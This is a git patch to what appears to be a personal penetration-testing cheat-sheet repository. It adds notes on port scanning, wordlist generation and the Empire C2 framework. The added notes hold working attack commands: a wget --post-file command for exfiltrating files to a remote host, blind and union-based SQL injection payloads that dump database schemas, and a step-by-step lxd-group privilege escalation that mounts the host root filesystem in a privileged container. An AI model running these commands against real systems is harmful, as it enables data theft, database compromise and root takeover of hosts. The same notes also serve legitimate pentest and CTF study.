From 3957f28be820021d0fe69357d224fc97ec149272 Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 24 Sep 2021 00:54:18 +0200 Subject: [PATCH] added stuff --- .gitmodules | 9 ++++++ enumeration/CeWL | 1 + enumeration/RustScan | 1 + enumeration/docs/cewl.md | 4 +++ enumeration/docs/rustscan.md | 14 ++++++++ enumeration/enumeration | 1 + exfiltration/linux/wget.md | 7 ++++ exploit/sqli/sqli.md | 15 ++++++++- misc/{ => level3_hypervisor}/docker_sec/dive | 0 .../docker_sec/docker.md | 0 misc/level3_hypervisor/lxc.md | 32 +++++++++++++++++++ post_exploitation/docs/empire.md | 19 ++++++++--- 12 files changed, 97 insertions(+), 6 deletions(-) create mode 160000 enumeration/CeWL create mode 160000 enumeration/RustScan create mode 100644 enumeration/docs/cewl.md create mode 100644 enumeration/docs/rustscan.md create mode 160000 enumeration/enumeration create mode 100644 exfiltration/linux/wget.md rename misc/{ => level3_hypervisor}/docker_sec/dive (100%) rename misc/{ => level3_hypervisor}/docker_sec/docker.md (100%) create mode 100644 misc/level3_hypervisor/lxc.md diff --git a/.gitmodules b/.gitmodules index d2efa93..5e5443d 100644 --- a/.gitmodules +++ b/.gitmodules @@ -31,3 +31,12 @@ [submodule "exploit/web/php/Chankro"] path = exploit/web/php/Chankro url = https://github.com/TarlogicSecurity/Chankro.git +[submodule "enumeration/enumeration"] + path = enumeration/enumeration + url = https://github.com/digininja/CeWL.git +[submodule "enumeration/CeWL"] + path = enumeration/CeWL + url = https://github.com/digininja/CeWL.git +[submodule "enumeration/RustScan"] + path = enumeration/RustScan + url = https://github.com/RustScan/RustScan.git diff --git a/enumeration/CeWL b/enumeration/CeWL new file mode 160000 index 0000000..3c0e726 --- /dev/null +++ b/enumeration/CeWL @@ -0,0 +1 @@ +Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d diff --git a/enumeration/RustScan b/enumeration/RustScan new file mode 160000 index 0000000..a444ab6 --- /dev/null +++ b/enumeration/RustScan @@ -0,0 +1 @@ +Subproject commit a444ab66e1d2ce17a3154b7cbe21a221bad97e30 diff --git a/enumeration/docs/cewl.md b/enumeration/docs/cewl.md new file mode 100644 index 0000000..d4dc79b --- /dev/null +++ b/enumeration/docs/cewl.md @@ -0,0 +1,4 @@ +# Cewl + +* Wordlist generator from website +* [CeWl repo](https://github.com/digininja/CeWL.git) diff --git a/enumeration/docs/rustscan.md b/enumeration/docs/rustscan.md new file mode 100644 index 0000000..dde658b --- /dev/null +++ b/enumeration/docs/rustscan.md @@ -0,0 +1,14 @@ +# Rustscan + +* [Rustscan repo](https://github.com/RustScan/RustScan) + +* Config at `$HOME/.rustscan_scripts.toml` + +## Usage +```sh +rustscan -r ports -a -- +``` +* Using nmap parameters +```sh +rustscan -a 127.0.0.1 -- -A -sC +``` diff --git a/enumeration/enumeration b/enumeration/enumeration new file mode 160000 index 0000000..3c0e726 --- /dev/null +++ b/enumeration/enumeration @@ -0,0 +1 @@ +Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d diff --git a/exfiltration/linux/wget.md b/exfiltration/linux/wget.md new file mode 100644 index 0000000..fc5d679 --- /dev/null +++ b/exfiltration/linux/wget.md @@ -0,0 +1,7 @@ +# POST via wget + +## Usage +Send file via wget +``` +sudo wget --post-file= http://: +``` diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md index dac5111..1b4e77b 100644 --- a/exploit/sqli/sqli.md +++ b/exploit/sqli/sqli.md @@ -34,12 +34,22 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ### Blind injection // Guessing characters ```sh -http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ +http://example.com/?id=1' and substr((select database()),1,1) < 105 --+ +``` +```sh +http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ ``` * Function substr(string, start, length) * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` ### Union based +* _First method__ check by order until error occurs +```sql +' order by 1 -- - +' order by 2 -- - +' order by 3 -- - +``` +* __Second method__ fuzzing NULL values, followed by fuzzing data types * Check number of cols ```sql ' UNION SELECT NULL-- @@ -78,6 +88,9 @@ id=(SELECT banner FROM v$version) # oracle ``` * sqlite specific ```sql +' UNION SELECT sql, sql FROM sqlite_master -- - +``` +```sql (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') ``` diff --git a/misc/docker_sec/dive b/misc/level3_hypervisor/docker_sec/dive similarity index 100% rename from misc/docker_sec/dive rename to misc/level3_hypervisor/docker_sec/dive diff --git a/misc/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md similarity index 100% rename from misc/docker_sec/docker.md rename to misc/level3_hypervisor/docker_sec/docker.md diff --git a/misc/level3_hypervisor/lxc.md b/misc/level3_hypervisor/lxc.md new file mode 100644 index 0000000..c3edf01 --- /dev/null +++ b/misc/level3_hypervisor/lxc.md @@ -0,0 +1,32 @@ +# LXC + +## Privilege Escalation + +### Member of lxd Group + +* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/) +* User has to be in `lxd` group, not necessarily `sudo`. + +#### Usage +* Clone and build +```sh +git clone https://github.com/saghul/lxd-alpine-builder.git +cd lxd-alpine-builde && sudo && ./build alpine +``` +* Upload to target +* Import alpine image +```sh +lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage +``` +* Prepare image +```sh +lxc image list +lxc init myimage ignite -c security.privileged=true +lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true +lxc start ignite +lxc exec ignite /bin/sh +``` +* Host `/` is mounted at `/mnt/root` inside the container +* `root` directory is at `/mnt/root/root` + + diff --git a/post_exploitation/docs/empire.md b/post_exploitation/docs/empire.md index 8709358..7edb7fe 100644 --- a/post_exploitation/docs/empire.md +++ b/post_exploitation/docs/empire.md @@ -1,11 +1,20 @@ # Empire C2 -## Parts -* Listeners -* Stagers, payloads generated, for example a reverse, delivery mechanism for agents -* Agents -* Modules use through agents +* [Empire Repo](https://github.com/BC-SECURITY/Empire.git) +## Start Client and Server +```sh +poetry run python empire --server --rest --notifications +poetry run python empire.py client +``` + +## Parts +* __Listeners__ receive connections from stagers +* __Stagers__ payloads generated, for example a reverse, delivery mechanism for agents +* __Agents__ remote on target device tasks +* __Modules__ use modularized payload on agents +* __Credentials__ +* __Report__ information on devices * Results are stored in a DB